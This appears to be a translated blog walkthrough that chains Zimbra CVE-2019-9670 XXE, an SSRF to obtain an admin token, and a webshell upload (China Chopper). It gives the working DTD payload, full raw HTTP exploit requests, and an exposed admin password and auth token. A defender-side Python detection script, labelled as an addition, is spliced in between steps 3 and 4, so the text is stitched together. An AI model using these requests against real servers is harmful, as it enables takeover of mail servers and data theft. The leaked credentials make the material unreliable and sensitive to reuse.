Zimbra

Step 1: Read the configuration file via XXE


This step uses the CVE-2019-9670 vulnerability to read the configuration file. You need to place a DTD file on your own VPS and make it reachable over HTTP. For the demonstration I created a repository on GitHub and fetched the DTD file from there.

The value outlined in red in the screenshot above is the password of the zimbra account; note it down, it is needed later.

The contents of the DTD file are as follows:

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

The POST request is as follows:

POST /Autodiscover/Autodiscover.xml HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 436  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<!DOCTYPE Autodiscover [  
        <!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd">  
        %dtd;  
        %all;  
        ]>  
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">  
    <Request>  
        <EMailAddress>aaaaa</EMailAddress>  
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>  
    </Request>  
</Autodiscover>  

Step 2: Obtain a low-privilege token

The screenshot above shows that a token has been obtained, but it is not an administrator token; note it down for later use.

The POST request is as follows:

POST /service/soap HTTP/1.1  
Host: mail.****.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/  
Content-Type: application/soap+xml  
Content-Length: 467  
Connection: close  
Cookie: ZM_TEST=true  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAccount">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>  

Step 3: Obtain an admin token via SSRF

Add the low-privilege token obtained in the previous step to the cookie, change xmlns="urn:zimbraAccount" to xmlns="urn:zimbraAdmin", append ":7071" to the Host header, and use the https scheme in the target parameter of the URL. Sending the request then returns an admin token.

The POST request is as follows:

POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1  
Host: mail.****.com:7071  
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2  
Accept-Encoding: gzip, deflate  
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml  
Content-Length: 465  
Connection: close  
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b  
Upgrade-Insecure-Requests: 1  

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">  
   <soap:Header>  
       <context xmlns="urn:zimbra">  
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851"/>  
       </context>  
   </soap:Header>  
   <soap:Body>  
     <AuthRequest xmlns="urn:zimbraAdmin">  
        <account by="adminName">zimbra</account>  
        <password>GzXaU76_s5</password>  
     </AuthRequest>  
   </soap:Body>  
</soap:Envelope>  
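As an added defender-side example (not code from the original post), the following Python inspects a captured HTTP request for the indicators of steps 1 and 3 above: a DOCTYPE declaring an external parameter entity on the Autodiscover endpoint, and a /service/proxy target pointing at the loopback admin port 7071 or the admin SOAP namespace sent through the public web port. The hostnames, the DTD URL (attacker.example), the token value and the sample bodies are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlparse

LOOPBACK = {"127.0.0.1", "localhost", "::1", "0.0.0.0"}
EXTERNAL_ENTITY = re.compile(r"<!entity\s+%?\s*\w+\s+(system|public)\b")

def inspect_request(request_line, headers, body):
    """Return the names of every rule the request trips (empty list = nothing flagged)."""
    _method, path, _version = request_line.split(" ", 2)
    host, text, hits = headers.get("Host", ""), body.lower(), []
    # Rule 1: a DOCTYPE declaring an external (SYSTEM/PUBLIC) entity, as the XXE payload does.
    if "<!doctype" in text and EXTERNAL_ENTITY.search(text):
        hits.append("xxe-external-entity")
    # Rule 2: any DOCTYPE at all on the Autodiscover servlet, the endpoint abused by CVE-2019-9670.
    if path.lower().startswith("/autodiscover/autodiscover.xml") and "<!doctype" in text:
        hits.append("autodiscover-doctype")
    # Rule 3: /service/proxy asked to reach loopback, port 7071 or the admin service (the SSRF step).
    if path.startswith("/service/proxy"):
        match = re.search(r"[?&]target=([^&\s]+)", path)
        target = urlparse(unquote(match.group(1)) if match else "")
        if (target.hostname in LOOPBACK or target.port == 7071
                or target.path.startswith("/service/admin")):
            hits.append("ssrf-proxy-to-admin")
    # Rule 4: Host header carrying the admin port on traffic seen at the public web port.
    if host.rsplit(":", 1)[-1] == "7071":
        hits.append("host-header-admin-port")
    # Rule 5: the admin SOAP namespace sent anywhere but the admin service itself.
    if "urn:zimbraadmin" in text and not path.startswith("/service/admin/"):
        hits.append("admin-namespace-outside-admin-service")
    return hits

# Constructed samples modelled on the requests in the post; hosts, DTD URL and token are placeholders.
XXE_REQUEST = (
    "POST /Autodiscover/Autodiscover.xml HTTP/1.1",
    {"Host": "mail.example.com", "Content-Type": "application/soap+xml"},
    '<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "http://attacker.example/dtd"> %dtd; %all; ]>'
    "<Autodiscover><Request><AcceptableResponseSchema>&fileContents;"
    "</AcceptableResponseSchema></Request></Autodiscover>",
)
SSRF_REQUEST = (
    "POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1",
    {"Host": "mail.example.com:7071", "Cookie": "ZM_ADMIN_AUTH_TOKEN=<placeholder>"},
    '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Body>'
    '<AuthRequest xmlns="urn:zimbraAdmin"><account by="adminName">zimbra</account>'
    "</AuthRequest></soap:Body></soap:Envelope>",
)
BENIGN_LOGIN = ("POST /service/soap HTTP/1.1", {"Host": "mail.example.com"},
    '<AuthRequest xmlns="urn:zimbraAccount"><account by="name">alice</account></AuthRequest>')
```

Run the three samples through inspect_request: the benign login yields nothing, while the two crafted requests each trip the rules for their step, which is the shape a WAF or proxy-log rule set for this chain should take.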

Step 4: Upload a webshell

Add the admin token obtained in the previous step to the cookie, then upload the webshell.

The webshell path is /downloads/k4x6p.jsp; the admin token must be included in the cookie when accessing it.

You can use this webshell to create a small shell that China Chopper (菜刀) can connect to in another directory that is accessible without the cookie.

I mainly did some collating work here; thanks to the experts online who wrote the analysis articles.

Reference links:

https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

https://blog.csdn.net/fnmsd/article/details/88657083

http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448

http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd
